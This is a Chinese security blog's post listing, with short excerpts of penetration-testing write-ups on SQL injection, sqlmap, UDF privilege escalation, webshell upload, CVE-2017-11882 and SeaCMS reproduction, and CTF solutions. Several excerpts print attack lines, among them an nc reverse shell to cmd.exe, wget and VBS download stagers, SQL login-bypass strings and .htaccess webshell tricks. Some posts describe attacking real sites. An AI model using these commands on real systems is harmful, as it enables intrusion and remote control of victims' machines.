自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

原创 新博客

http://hone.cool

2018-03-19 17:20:30 149 0

原创 高版本的udf提权

最近一直在学习技术,虽然过程中遇到了些问题,但都解决了。下面就记录一些吧,给自己老年的时候看,哈哈哈。--怀着一颗低调的心奋发前行。配置环境:phpstudy(mysql5.5.53版本)  2012R2 64位首先访问脚本,是款暗月的mysql全版本通杀提权神器,网上找的。需要输入mysql数据...

2018-02-08 11:41:36 4967 1

原创 通过注入拿下服务器

    首先,碰到了个站。注入漏洞,看一下是不是DBA权限。   当前用户是DBA权限,执行os-shell       可以直接执行命令,但是有时候会卡到链接超时,在执行os-shell的过程中有条信息,就是上面打红的地方(忽略掉打码技术),访问该地址它。     ...

2017-12-28 14:58:49 2097 1

原创 CVE-2017-11882复现

目标机:win7 office2013 (192.168.72.129)攻击机:kali (192.168.72.139)利用脚本工具:https://github.com/starnightcyber/CVE-2017-11882复现0x01:使用在上述的工具,生成漏洞的doc文件。python...

2017-11-22 15:23:58 650 0

原创 内网渗透之MSF 路由转发

    如果我已经拿到了一台内网服务器,需要使用MSF去访问内网资源,这时候就需要在msf中添加去往“内网网段”的路由。     MSF跳板实现过程:            需要获得一个msf的session会话;            获取内网地址网段;            在msf中添加”内...

2017-11-22 11:24:22 4429 0

原创 海洋CMS复现

使用环境:肉鸡服务器:103.229.126.201攻击机:win7(192.168.72.130)目标机:win7(192.168.72.129)+(seacms v6.53)POC:POST /seacms/upload/search.php HTTP/1.1Host: 192.168.72....

2017-11-08 14:38:02 1772 0

原创 某站登入框存在post注入

验证方法,在账号密码处输入' 如果报错说明有该漏洞存在。用burp抓包,具体怎么做,之前博客里有: http://blog.csdn.net/qq_36512966/article/details/70976527然后用sqlmap跑包。命令为:sqlmap -r “包的地址”如图,成功...

2017-09-29 11:13:36 1512 0

原创 通过cmd上传文件的方法-debug方法

测试机:xp(32位)工具:exe2bat.exe 位于kali中的 /usr/share/windows-binaries目录原理:将需要上传的程序转换为十六进制hex的形式,然后debug将hex编译还原。如图:执行命令:wine exe2bat.exe ew.exe ew.txt      ...

2017-09-28 11:58:06 1008 0

原创 通过cmd上传文件的方法-wget方法

测试机:win2003(win系统都可以,不一一举例)工具:wget.exe用法cmd下wget.exe http://www.xxx.com/xxx -O c:/windows/xxx(本地保存路径)如图:OK,上传成功。其实这个方法比较多余, 因为在拿到shell之后想办法传程序上去,wget...

2017-09-27 17:25:29 3365 0

原创 通过cmd上传文件的方法-vbs脚本

测试机:win2003 (win2008 xp 都行,不一一举例了,但是也有局限性,win7以上的大部分版本就运行不成功)很简单,复制粘贴代码即可:cmd下:echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.O...

2017-09-27 16:33:02 557 0

原创 nc的使用

攻击机:kali  192.168.72.128目标机:win2003 192.168.72.131首先在攻击机监听本地端口7777nc -lvvp 77771在目标机上运行nc.exenc.exe 192.168.72.128 7777 -e c:\windows\system32\cmd.ex...

2017-09-27 15:52:17 315 0

原创 ISCC2017 Web write up

一 打开连接: 注意You give me f1ag and I will give you flag too~~~ 这段话有猫腻,没错就是f1ag和flag。 提交f1ag。 出现:哼,就给我一个flag我才不和你换呢。 右...

2017-05-25 13:37:59 1086 0

原创 ISCC2017 Misc write up附件题目文件

一 打开附件是个.docx文档,打开是乱码。 改后缀名为.zip 打开发现: 都是.xml配置文件,找到document.xml时出现flag。 二 打开附件是个.pcapng文件。用wireshark打开。发现是个tcp协议,追踪TCP流。 有个key.zip和test...

2017-05-25 13:09:01 1888 0

原创 ISCC2017 Basic write up附加题目文件

Wheel Cipher 身为二战时期的密码专家,你截获了通信员身上的一段密文、密钥序列和加密列表。你能看懂吗? 加密表: 1: 2: 3: 4: 5: 6: 7: 8: 9: 10: 11: 12: 13:   密钥为:2,3,7,5,13,12,9,1,8,10,4,11...

2017-05-25 12:51:13 2888 0

原创 sqlmap的tamper问题

每次日站时,看见安全狗都失望完! 所有接下来分析过滤系统到底过滤了哪些参数,该如何绕过。 sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。 当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号...

2017-05-24 21:28:09 822 0

原创 sqlmap常用命令

-u #注入点 -f #指纹判别数据库类型 -b #获取数据库版本信息 -p #指定可测试的参数(?page=1&id=2 -p “page,id”) -D “” #指定数据库名 -T “” #指定表名 -C “” #指定字段 -s “” #保存注入过程到一个文件,还可中断,...

2017-05-24 21:05:03 367 0

原创 htaccess文件上传拿shell

1.创建htaccess文件,编辑内容为: SetHandler application/x-httpd-php 然后再上传shell.jpg的木马, 这样shell.jpg就可解析为php文件。 2.编辑内容为:  demo.jpg> ForceType application/x...

2017-05-24 20:50:58 4784 0

原创 渗透之信息收集

在渗透测试开始之前,第一步信息收集,对网站的结构有个初步了解,第二步才是扫目录。 那么,信息收集包括哪方面呢, 主要是:IP地址,端口,脚本类型,搭建环境,whois查询等。 例如目标网站:http://www.bplead.com/ 查询SEO: 可见,权重为0,一般的权重为...

2017-05-24 12:21:30 485 0

原创 后台登入万能密码合集

asp aspx万能密码   1: "or "a"="a    2: ')or('a'='a    3:or 1=1--    4:'or 1=1--    5:a'or'...

2017-05-24 11:29:09 10748 0

转载 xss妙用,快速测试xss漏洞。

#介绍# 这篇文章的主要目的是去给应用安全测试者提供一份xss漏洞检测指南。文章的初始内容由RSnake提供给OWASP,从他的xss备忘录:http://ha.ckers.org/xss.html 。目前这个网页已经重定向到我们这里,我们打算维护和完善它。OWASP的第一个防御备忘录项目:the...

2017-05-24 11:21:39 10583 0

原创 phpstudy搭建DVWA

首先下载phpstudy和DVWA。 http://www.phpstudy.net/ http://www.dvwa.co.uk/ 将DVWA解压后复制到phpstudy目录下的WWW目录。如图 用记事本打开DVWA/config/config.inc.php文件,修改密码。 ...

2017-04-30 21:15:34 10770 6

原创 文件包含拿webshell

本实验的目的:如何在杀软软件防范下绕过检测上传大马。    新建一个记事本,内容为 命名为:1.asp 将我们的大马.asp改名为:123.jpg            将上述的1.asp和123.jpg上传到菜刀里 接下来,访问1.asp OK,成功执...

2017-04-30 14:48:36 2499 0

原创 记Fck编辑器拿shell

那天同学的QQ被黑发来的挂马网站手贱看了下。 用御剑扫描了一下。 有FCK编辑器。 但御剑扫出的url访问的页面不正常。 于是在网上查了查关于FCK编辑器的路径。 fckeditor/editor/filemanager/browser/default/browser...

2017-04-29 17:31:15 3299 0

原创 通过后台登入界面拿到管理员帐号密码-post注入

post注入主要针对登入界面。 一.第一种方法就是利用sqlmap自动填写表单.命令:sqlmap.py –u”www.xxx.com/xxx/login.asp“ --forms 一般情况下一路回车 二.第二种利用brupsite抓包,在用sqlmap –r 命令 然后打开sql...

2017-04-29 17:21:37 4106 0

原创 cookie中转注入,使用sqlmap中转注入

一,判断是否有cookie注入:目标网站http://www.xxx.com/x.asp?id=11.在IE浏览器访问去掉参数(id=1)的url: http://www.xxx.com/x.asp?(加载页面,显示不正常,原因是没有输参数)。2.在IE浏览器输入javascript:alert(...

2017-04-29 17:04:33 6191 0

原创 Filetype修改上传

产生条件:上传点只对文件上传类型及大小判断(没验证文件后缀),此时就可以改Filetype绕过上传。 JPG文件后缀自带的type Php文件后缀自带的type(这时是不允许上传的) 然后将php的文件类型替换成jpg的文件类型。 即可绕过上传

2017-04-29 16:56:50 400 0

原创 access注入及工具使用

Access数据结构:  Access数据库           表名                 列名                      数据 Access注入:   首先判断是否有注入点:   http://www.xxx.com/xxx.asp?id=166’(页面...

2017-04-29 16:51:46 590 0

原创 搭建平台区别

专业搭建平台 iis Apache uginx tomcat 简单的搭建软件        Phpstudy Apmserv 小旋风 搭建平台和搭建软件区别 功能性区别会影响到我们渗透的方法如:提权 搭建平台权限设置严格 搭建软件权限设置宽松。

2017-04-29 16:35:44 340 0

提示
确定要删除当前文章?
取消 删除